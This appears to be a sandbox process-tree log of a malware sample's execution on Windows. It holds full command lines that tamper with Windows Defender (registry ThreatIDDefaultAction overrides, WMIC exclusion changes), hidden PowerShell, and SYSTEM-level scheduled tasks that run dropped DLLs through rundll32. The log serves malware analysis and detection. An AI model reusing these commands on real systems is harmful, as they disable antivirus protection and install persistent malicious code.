C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\MJlIBK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\XjFVZlb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JHJXtPPPvDXVqpH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\NNpirKV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\ROnwOoo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\qYUJOOH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\zInvEZW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aNyMQclguOCSCcjxm" /SC once /ST 03:05:18 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nlcUipsDcFbdntMB\jaXiotkM\TMeXSNs.dll\",#1 /Podidwg 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aNyMQclguOCSCcjxm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WHKNq1" /SC once /ST 04:26:59 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WHKNq1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WHKNq1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yfARWRprRqUFWeTGf"2⤵
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\jaXiotkM\TMeXSNs.dll",#1 /Podidwg 3851181⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\jaXiotkM\TMeXSNs.dll",#1 /Podidwg 3851182⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aNyMQclguOCSCcjxm"3⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f91aab58,0x7ff8f91aab68,0x7ff8f91aab782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2012 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3312 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3328 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3824 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4396 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4568 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:82⤵
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5192 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 98809F80856CDB774CFDFE75223624B12⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 9D06CF248F112F08D6ECE29E2AF58D6C E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FD2C29E60D4E3A3D5A5CF2D35E41C1F2 M Global\MSI00002⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\Install.exe Wt /nOMdidyFFk 385118 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
